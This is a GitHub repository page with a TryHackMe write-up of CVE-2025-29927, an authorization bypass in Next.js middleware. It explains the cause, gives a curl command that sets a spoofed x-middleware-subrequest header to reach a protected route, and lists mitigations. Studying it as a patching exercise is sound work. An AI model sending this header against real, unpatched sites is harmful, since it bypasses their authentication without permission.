Skip to content

Jull3Hax0r/next.js-exploit

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

13 Commits
README.md
README.md
 
 
next.js-exploit.md
next.js-exploit.md
 
 

Repository files navigation

🚨 Next.js Exploit – CVE-2025-29927

Solved TryHackMe Room

How to exploit Next.js middleware using x-middleware-subrequest header
Vulnerability ID: CVE-2025-29927

🧠 About Next.js

Next.js (by Vercel) is a React framework that supports:

  • Static Site Generation (SSG)
  • Server-Side Rendering (SSR)
  • File-based routing
  • Middleware for request control

These features improve performance and user experience across web apps in e-commerce, news, documentation, and more.

⚠️ CVE-2025-29927 Overview

  • Discovered by: Rachid & Yasser Allam
  • Affected versions: < 14.2.25 and < 15.2.3
  • Impact: Authorization bypass when checks are implemented in middleware

Next.js middleware is used for access control, such as checking authentication. However, when a crafted header is added, the middleware logic may be skipped entirely.

🔧 Understanding Middleware in Next.js

Middleware allows developers to intercept requests before routing. It is typically used to:

  • Enforce user authentication
  • Apply access control logic
  • Perform redirects or logging

Since routing in Next.js is file-based, middleware acts as the gatekeeper before a route is served.

If middleware blocks access, the user will not reach the protected page.

💣 The Vulnerability: x-middleware-subrequest

This exploit abuses the internal header:

x-middleware-subrequest: middleware

Why this is dangerous:

When this header is set, the request is treated as a subrequest by Next.js. Subrequests might bypass standard authentication checks applied by middleware.

🔍 How the Exploit Works

✅ Normal Behavior

GET /protected
→ Middleware runs authentication logic
→ Request is blocked if unauthorized

❌ Exploit Behavior

curl -H "x-middleware-subrequest: middleware" http://<IP>:3000/protected

→ Middleware thinks this is a safe internal request
Authentication logic skipped
→ 🔓 Access granted!

🧪 Demo (TryHackMe)

💡 Tested on a TryHackMe machine with permission. Never test this on a system you don't own or control.

Target:

http://<IP>/protected

Exploit:

curl -H "x-middleware-subrequest: middleware" http://<IP>:3000/protected

Result:

Target Screenshot

As you can see, the protected page was accessed without authentication.

Flag proof:

THM{XXXXXX}

🧷 Why It Works

  • Next.js trusts the x-middleware-subrequest header
  • No validation is done on who sets the header
  • Middleware skips critical checks for subrequests
  • Attackers can spoof subrequests manually

🛡️ Mitigation

  • Upgrade to:
    • v14.2.25 or higher
    • v15.2.3 or higher
  • ✅ Avoid trusting internal headers from clients
  • ✅ Enforce access control at route-level or with JWT/session checks in route handlers

✅ Conclusion

  • x-middleware-subrequest tells Next.js to treat the request as internal.
  • If set to middleware, security logic may be skipped.
  • This leads to full authorization bypass of protected routes.
  • Fix: Upgrade immediately and stop trusting client-supplied x-* headers.

🧢 Writeup by Jull3Hax0r
🧪 Tested on TryHackMe

About

Hoe to exploit next.js with CVE-2025–29927

Topics

ctf writeups tryhackme

Resources

Readme
Activity

Stars

2 stars

Watchers

1 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published